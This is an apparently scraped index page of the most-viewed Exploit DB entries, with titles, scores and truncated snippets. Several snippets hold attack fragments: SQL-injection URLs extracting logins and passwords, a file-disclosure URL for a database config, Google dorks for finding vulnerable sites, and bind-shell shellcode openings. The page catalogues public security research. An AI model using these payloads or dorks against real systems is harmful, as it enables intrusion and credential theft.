Exploitdb: Most viewed

47884 matches found

Exploit DB
added 2013/10/14 12:00 a.m.
66423 views

StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading

StatusNet/Laconica title = $this-trimmed'title'; $this-filename = INSTALLDIR.'/doc-src/'.$this-title; //1 if !fileexists$this-filename $this-clientError'No such document.'; return; $this-showPage;...

AI score: 7
Exploits: 0

Exploit DB
added 2008/02/17 12:00 a.m.
52723 views

PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload

Powered by PHPizabi v0.848b C1 HFP1 remote file upload author: ZoRLu home: www.yildirimordulari.org contact: [email protected] dork: "Powered by PHPizabi v0.848b C1 HFP1" exploit: http://localhost/izabi/system/cache/pictures/idshell.php -first register web site -Create an event on the click an...

AI score: 7.4
Exploits: 0

Exploit DB
added 2007/07/25 12:00 a.m.
36689 views

IndexScript 2.8 - 'cat_id' SQL Injection

Site: http://indexscript.com Found By: xssvgamer Google Dork: allintext: "This site is powered by IndexScript" exploit: http://www.example.com/showcat.php?catid=-1 UNION ALL SELECT login,password FROM dirlogin / Blind SQL injection in indexscript.. Vul Code: "$sql = "select name, metatitle,...

AI score: 7
Exploits: 0

Exploit DB
added 2007/10/10 12:00 a.m.
29751 views

cpDynaLinks 1.02 - 'category.php' SQL Injection

!/usr/bin/perl cpDynaLinks 1.02 Remote Sql Inyection exploit download: http://www.cplinks.com/download/cpdynalinks/cpdynalinksversion102full.zip bug found by s0cratex exploit written by ka0x D.O.M TEAM 2007 d0rk: Powered by cpDynaLinks need magicquotesgpc off contact: ka0x@domlabs: perl...

AI score: 7.4
Exploits: 0

Exploit DB
added 2008/09/19 12:00 a.m.
23548 views

easyLink 1.1.0 - 'detail.php' SQL Injection

easyLink V1.1.0 detail.php Remote SQL Injection Vulnerability Discovered By: Egypt Coder home : WWW.Sec-Area.com Mail:...

AI score: 7.4
Exploits: 0

Exploit DB
added 2008/04/06 12:00 a.m.
23079 views

Site Sift Listings - 'id' SQL Injection

powered by Site Sift scripts SQL Injection AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 BLOG : http://my.opera.com/SQL-Injection/blog/ MAiL : [email protected] DORK 1 : powered by Site Sift DORK 2 : allinurl: "index php go addpage" DORK 2 : allinurl: "index.php?go=deta...

AI score: 7.4
Exploits: 0

Exploit DB
added 2010/03/14 12:00 a.m.
21773 views

DZCP (deV!L`z Clanportal) 1.5.2 - Remote File Inclusion

deV!Lz Clanportal 1.5.2 Remote File Include Vulnerability + Discovered By: cr4wl3r + Download: http://www.dzcp.de/downloads/?action=download&id=131 x Code in dzcp1.5.2/inc/config.php REQUIRES requireonce$basePath."/inc/mysql.php"; $code $tpl = strreplace''.$value.'', $code, $tpl; return $tpl; +...

AI score: 7.4
Exploits: 0

Exploit DB
added 2019/01/11 12:00 a.m.
19556 views

OpenSSH SCP Client - Write Arbitrary Files

''' Title: SSHtranger Things Author: Mark E. Haase Homepage: https://www.hyperiongray.com Date: 2019-01-17 CVE: CVE-2019-6111, CVE-2019-6110 Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 We have nicknamed this...

CVSS: 6.8
AI score: 6.8
EPSS: 0.57569
Exploits: 10

Exploit DB
added 2023/04/01 12:00 a.m.
18166 views

Apache 2.4.x - Buffer Overflow

Exploit Title: Apache 2.4.x - Buffer Overflow Date: Jan 2 2023 Exploit Author: Sunil Iyengar Vendor Homepage: https://httpd.apache.org/ Software Link: https://archive.apache.org/dist/httpd/ Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 Tested on: Server Kali, Client MacOS...

CVSS: 9.8
AI score: 10
EPSS: 0.86227
Exploits: 4

Exploit DB
added 2013/05/06 12:00 a.m.
17561 views

WeBid 1.0.6 - Multiple Vulnerabilities

Title: Webid Blind SQL Injection / Local File Disclosure Vulnerability Google Dork: intext:"Powered by WeBid" Author: Ahmed Aboul-Ela Contact: Ahmed.Aboul3laatgmaildotcom Vendor: http://www.webidsupport.com/ Software Link:...

AI score: 7.4
Exploits: 0

Exploit DB
added 2014/09/24 12:00 a.m.
17269 views

Glype 1.4.9 - Local Address Filter Bypass

Glype proxy local address filter bypass. Securify, September 2014. Abstract...

AI score: 7.4
Exploits: 0

Exploit DB
added 2014/10/06 12:00 a.m.
15606 views

Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection

!/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x " argc = lensys.argv ifargc 3: usage sys.exit0 rport = 25 rhost = sys.argv1 cmd = sys.argv2 headers = "To",...

AI score: 7
Exploits: 0

Exploit DB
added 2011/11/30 12:00 a.m.
13835 views

WikkaWiki 1.3.2 - Multiple Vulnerabilities

---------------------------------------------------- WikkaWiki Query" 142. UPDATE ".$this-GetConfigValue'tableprefix'."users 143. SET email = '".mysqlrealescapestring$email."', 144. doubleclickedit = '".mysqlrealescapestring$doubleclickedit."', 145. showcomments =...

CVSS: 7.5
AI score: 7
EPSS: 0.04702
Exploits: 13

Exploit DB
added 2008/07/28 12:00 a.m.
13366 views

Pligg CMS 9.9.0 - 'story.php' SQL Injection

Pligg Beta 9.9.0 id Remote SQL Injection Vulnerability | Hussin X | Author: Hussin X | Home : www.tryag.cc/cc | email: darkangelg85atYahooDoTcom | script : http://www.pligg.com/ | DorK : Powered By Pligg | Legal: License...

AI score: 7.4
Exploits: 0

Exploit DB
added 2010/01/11 12:00 a.m.
13237 views

Alex Guestbook - Multiple Vulnerabilities

Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi...

AI score: 7.4
Exploits: 0

Exploit DB
added 2012/05/12 12:00 a.m.
12950 views

WikkaWiki 1.3.2 - Spam Logging PHP Injection (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "WikkaWiki 1.3.2...

CVSS: 6.8
AI score: 7
EPSS: 0.04528
Exploits: 11

Exploit DB
added 2001/07/18 12:00 a.m.
12369 views

Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Remote Buffer Overflow

// source: https://www.securityfocus.com/bid/3064/info A boundary condition error exists in telnet daemons derived from the BSD telnet daemon. Under certain circumstances, the buffer overflow can occur when a combination of telnet protocol options are received by the daemon. The function...

AI score: 7.4
Exploits: 0

Exploit DB
added 2016/12/07 12:00 a.m.
11566 views

OpenSSH 7.2 - Denial of Service

Title : OpenSSH before 7.3 Crypt CPU Consumption DoS Vulnerability Author : Kashinath T [email protected] www.secpod.com Vendor : http://www.openssh.com/ Software : http://www.openssh.com/ Version : OpenSSH before 7.3 Tested on : Ubuntu 16.04 LTS, Centos 7 CVE : CVE-2016-6515 Date : 20-10-201...

CVSS: 7.8
AI score: 7.4
EPSS: 0.77091
Exploits: 5

Exploit DB
added 2011/10/17 12:00 a.m.
11558 views

asgbookPHP 1.9 - 'index.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/50167/info asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the...

AI score: 7.4
Exploits: 0

Exploit DB
added 2007/02/28 12:00 a.m.
11505 views

HyperBook Guestbook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure

source: https://www.securityfocus.com/bid/22754/info HyperBook Guestbook is prone to an information-disclosure vulnerability because the application fails to protect sensitive information. An attacker can exploit this issue to access sensitive information that may lead to other attacks. This issu...

AI score: 7
Exploits: 0

Exploit DB
added 2010/04/29 12:00 a.m.
11217 views

DZCP (deV!L`z Clanportal) 1.5.3 - Multiple Vulnerabilities

Title : deV!Lz Clanportal V1.5 Mullti Vulnerability | Author : indoushka | email : [email protected] | Home : www.iqs3cur1ty.com/vb | Script : CMS © 2005 - 2010 by deV!Lz Clanportal - supported by...

AI score: 7.4
Exploits: 0

Exploit DB
added 2013/01/28 12:00 a.m.
10724 views

PHP weby directory software 1.2 - Multiple Vulnerabilities

Vulnerable Software: PHP Weby directory software version 1.2 Vendor: http://phpweby.com Download: htp://phpweby.com/down/phpwebydirectory.zip Vuln: Blind SQL injection && CSRF Dork: intext:Powered by PHP weby software...

AI score: 7.4
Exploits: 0

Exploit DB
added 2016/01/15 12:00 a.m.
9225 views

phpDolphin 2.0.5 - Multiple Vulnerabilities

Exploit Title: phpDolphin http://target.com/index.php?a=search&q=teste&filter=m"XSS CSRF ==== We've found no protection against CSRF Cross-site Request Forgery, which made possible to do any kind of act on a user or admin account. NO FORMS are secured at all. But we've included some interesting...

AI score: 7.4
Exploits: 0

Exploit DB
added 2009/09/10 12:00 a.m.
9078 views

Advanced Comment System 1.0 - Multiple Remote File Inclusions

Advanced comment system1.0 Remote File Inclusion Vulnerability Found by : kurdish hackers team C0ntact : pshela at YaHoo .com Groups : Kurd-Team site : www.kurdteam.org ...

AI score: 7.4
Exploits: 0

Exploit DB
added 2019/01/18 12:00 a.m.
9025 views

SCP Client - Multiple Vulnerabilities (SSHtranger Things)

Exploit Title: SSHtranger Things Date: 2019-01-17 Exploit Author: Mark E. Haase Vendor Homepage: https://www.openssh.com/ Software Link: download link if available Version: OpenSSH 7.6p1 Tested on: Ubuntu 18.04.1 LTS CVE : CVE-2019-6111, CVE-2019-6110 ''' Title: SSHtranger Things Author: Mark E...

CVSS: 6.8
AI score: 6.8
EPSS: 0.57569
Exploits: 10

Exploit DB
added 2021/04/14 12:00 a.m.
8225 views

jQuery 1.2 - Cross-Site Scripting (XSS)

Exploit Title: jQuery 1.2 - Cross-Site Scripting XSS Date: 04/29/2020 Exploit Author: Central InfoSec Version: jQuery versions greater than or equal to 1.2 and before 3.5.0 CVE : CVE-2020-11022 Proof of Concept 1:...

CVSS: 6.9
AI score: 7
EPSS: 0.02456
Exploits: 7

Exploit DB
added 2008/04/26 12:00 a.m.
7408 views

PHPizabi 0.848b C1 HFP3 - Database Information Disclosure

PHPizabi v0.848b C1 HFP3 database information exposure. I would like to state that I am in no way responsible for how this information is used. It is just that, information and is...

AI score: 7
Exploits: 0

Exploit DB
added 2008/06/01 12:00 a.m.
7026 views

OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH

!/bin/python This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at your option any later version. This program is distributed in the hope that i...

AI score: 7
Exploits: 0

Exploit DB
added 2018/08/21 12:00 a.m.
6534 views

OpenSSH 2.3 < 7.7 - Username Enumeration

Exploit: OpenSSH 7.7 - Username Enumeration Author: Justin Gardner Date: 2018-08-20 Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz Affected Versions: OpenSSH version 7.7 CVE: CVE-2018-15473 ...

CVSS: 5.9
AI score: 6.3
EPSS: 0.90356
Exploits: 23

Exploit DB
added 2018/12/04 12:00 a.m.
6351 views

OpenSSH < 7.7 - User Enumeration (2)

!/usr/bin/env python2 CVE-2018-15473 SSH User Enumeration by Leap Security @LeapSecurity https://leapsecurity.io Credits: Matthew Daley, Justin Gardner, Lee David Painter import argparse, logging, paramiko, socket, sys, os class InvalidUsernameException: pass malicious function to malform packet...

CVSS: 5.9
AI score: 6.3
EPSS: 0.90356
Exploits: 23

Exploit DB
added 2021/04/14 12:00 a.m.
6327 views

jQuery 1.0.3 - Cross-Site Scripting (XSS)

Exploit Title: jQuery 1.0.3 - Cross-Site Scripting XSS Date: 04/29/2020 Exploit Author: Central InfoSec Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0 CVE : CVE-2020-11023 Proof of Concept 1: Proof of Concept 2 Only jQuery 3.x affected: "...

CVSS: 6.9
AI score: 7.3
EPSS: 0.3466
Exploits: 6

Exploit DB
added 2012/04/15 12:00 a.m.
6319 views

MediaXxx Adult Video / Media Script - SQL Injection

Exploit Title: MediaXxx Adult Video / Media Script SQL Injection Date: 19/05/2012 Author: Daniel Godoy Author Mail: DanielGodoyatGobiernoFederaldotcom Author Web: www.delincuentedigital.com.ar Software: MediaXxx http://www.mediaxxxscript.com/ Tested on: Linux Dork: "Powered by MediaXxx Mobile"...

AI score: 7
Exploits: 0

Exploit DB
added 2017/10/17 12:00 a.m.
6278 views

Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Tomcat RCE via JSP Upload Bypass', 'Description' = %q This module uploads a jsp payload and executes it. , 'Author' = 'peewpw', 'License' =...

CVSS: 8.1
AI score: 8.5
EPSS: 0.9438
Exploits: 22

Exploit DB
added 2008/01/21 12:00 a.m.
6257 views

BoastMachine 3.1 - 'mail.php' id SQL Injection

...:::::boastMachine =3.1 SQL Injection Vulnerbility ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the...

AI score: 7.4
Exploits: 0

Exploit DB
added 2017/11/09 12:00 a.m.
6187 views

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

Linux/x64 - Bind TCP 4444/TCP Shell /bin/sh + Password 1234567 Shellcode 136 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; cop...

AI score: 7.1
Exploits: 0

Exploit DB
added 2020/10/21 12:00 a.m.
5924 views

Tiki Wiki CMS Groupware 21.1 - Authentication Bypass

Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass Date: 01.08.2020 1st August 2020 Exploit Author: Maximilian Barz aka. Silky Vendor Homepage: tiki.org Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki21.xUYScuti/21.1/tiki-21.1.zip Version: 21.1 Tested on:...

CVSS: 9.8
AI score: 9.6
EPSS: 0.85573
Exploits: 5

Exploit DB
added 2008/01/05 12:00 a.m.
5906 views

snetworks PHP Classifieds 5.0 - Remote File Inclusion

+By CrackersChild+ Script.......: SNETWORKS PHP CLASSIFIEDS Page.........: http://www.snetworks.biz/ Author.......: CrackersChild | [email protected] & [email protected] Class........: Remote File İnclude Vulnerability Demo.........: http://xxxclassifieds.com/classifieds/...

AI score: 7.4
Exploits: 0

Exploit DB
added 2008/05/31 12:00 a.m.
5840 views

CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload

CMSimple 3.1 Local File Inclusion / Arbitrary File Upload download: http://www.cmsimple.org/?Downloads dork: "Powered by CMSimple" author: [email protected] homepage: http://irk4z.wordpress.com Local File Inclusion : http://host/path/index.php?sl=file%00...

AI score: 7.4
Exploits: 0

Exploit DB
added 2008/07/13 12:00 a.m.
5240 views

Maian Guestbook 3.2 - Insecure Cookie Handling

Maian Guestbook = 3.2 Insecure Cookie Handling Vulnerability Discovered By: S.W.A.T. E-Mail: svvateamatyahoodotcom Script...

AI score: 7
Exploits: 0

Exploit DB
added 2008/11/02 12:00 a.m.
5025 views

DZCP (deV!L`z Clanportal) 1.4.9.6 - Blind SQL Injection

use HTTP::Cookies; use LWP::UserAgent; my $ua = LWP::UserAgent-new cookiejar = HTTP::Cookies-new,; $ua-agent 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ; usage; print "\n"; $server = $ARGV0; $dir = $ARGV1; $username = $ARGV2; $password = $ARGV3; if !$password die "Argh! Read teh Usage!\n"; $url...

AI score: 7.4
Exploits: 0

Exploit DB
added 2019/04/08 12:00 a.m.
4823 views

Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation

?php CARPE DIEM: CVE-2019-0211 Apache Root Privilege Escalation Charles Fol @cfreal 2019-04-08 INFOS https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html USAGE 1. Upload exploit to Apache HTTP server 2. Send request to page 3. Await 6:25AM for logrotate to restart Apache 4...

CVSS: 7.8
AI score: 8.3
EPSS: 0.89568
Exploits: 8

Exploit DB
added 2006/07/01 12:00 a.m.
4708 views

DZCP (deV!L`z Clanportal) 1.34 - 'id' SQL Injection

? errorreportingEERROR; function exploitinit if !extensionloaded'phpcurl' && !extensionloaded'curl' if !dl'curl.so' && !dl'phpcurl.dll' die "oo error - cannot load curl extension!"; function exploitheader echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";...

AI score: 7.4
Exploits: 0

Exploit DB
added 2003/03/18 12:00 a.m.
4687 views

SIPS 0.2.2 - User Information Disclosure

source: https://www.securityfocus.com/bid/7134/info It has been reported that authentication is not required to view user account information. As a result, an unauthorized remote attacker may be able to view potentially sensitive information. This may aid in launching further attacks against a...

AI score: 7.4
Exploits: 0

Exploit DB
added 2014/11/02 12:00 a.m.
4667 views

Esotalk CMS 1.0.0g4 - Cross-Site Scripting

/ Exploit Title: esotalk cms topics xss vulnerability Google Dork: powered by esotalk Date: 2014-11-01 Vul Author: Evi1m0ff0000team Vul Advisory: http://www.hackersoul.com/post/ff0000-hsdb-0006.html Vendor Homepage: http://esotalk.org/ Software Link: http://esotalk.org/download Tested on: Linux /...

AI score: 7.4
Exploits: 0

Exploit DB
added 2007/02/21 12:00 a.m.
4661 views

DZCP (deV!L`z Clanportal) 1.4.5 - Remote File Disclosure

DZCP Devilz Clanportal = 1.4.5 Mysql Data viewable Found by: Kiba Solution: Install security Fix! Exploit: http://SITE/PATH/inc/filebrowser/browser.php?file=inc/mysql.php Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php milw0rm.com 2007-02-21...

AI score: 7.4
Exploits: 0

Exploit DB
added 2018/09/26 12:00 a.m.
4633 views

Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation

/ EDB-Note: Systems with less than 32GB of RAM are unlikely to be affected by this issue, due to memory demands during exploitation. EDB Note: poc-exploit.c / / poc-exploit.c for CVE-2018-14634 Copyright C 2018 Qualys, Inc. This program is free software: you can redistribute it and/or modify it...

CVSS: 7.8
AI score: 7.7
EPSS: 0.20572
Exploits: 6

Exploit DB
added 2021/03/11 12:00 a.m.
4426 views

Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC)

Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write Proxylogon Date: 2021-03-10 Exploit Author: testanull Vendor Homepage: https://www.microsoft.com Version: MS Exchange Server 2013, 2016, 2019 CVE: 2021-26855, 2021-27065 import requests from urllib3.exceptions import...

AI score: 7.4
Exploits: 0

Exploit DB
added 2016/01/05 12:00 a.m.
4118 views

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)

/ just another overlayfs exploit, works on kernels before 2015-12-26 Exploit Title: overlayfs local root Date: 2016-01-05 Exploit Author: rebel Version: Ubuntu 14.04 LTS, 15.10 and more Tested on: Ubuntu 14.04 LTS, 15.10 CVE : CVE-2015-8660 blah@ubuntu:$ id uid=1001blah gid=1001blah groups=1001bl...

CVSS: 7.2
AI score: 6.3
EPSS: 0.58352
Exploits: 12

Exploit DB
added 2012/03/28 12:00 a.m.
4039 views

BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)

Exploit Title: boastMachine v3.1 document.nano.submit; Greetz : Dr.WEP , JIKO , All FriendS...

AI score: 7.4
Exploits: 0

Exploit DB
added 2009/03/23 12:00 a.m.
3967 views

PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution

!/usr/bin/php ?php / Found this after getting my inet back and noticing this http://www.milw0rm.com/exploits/6085 . The only problem with the remote command execution there is that it actually requires registerglobals = on. I saw the GLOBAL keyword, and actually believed this populated those...

CVSS: 9.3
AI score: 6.6
EPSS: 0.04627
Exploits: 7

Total number of security vulnerabilities: 5000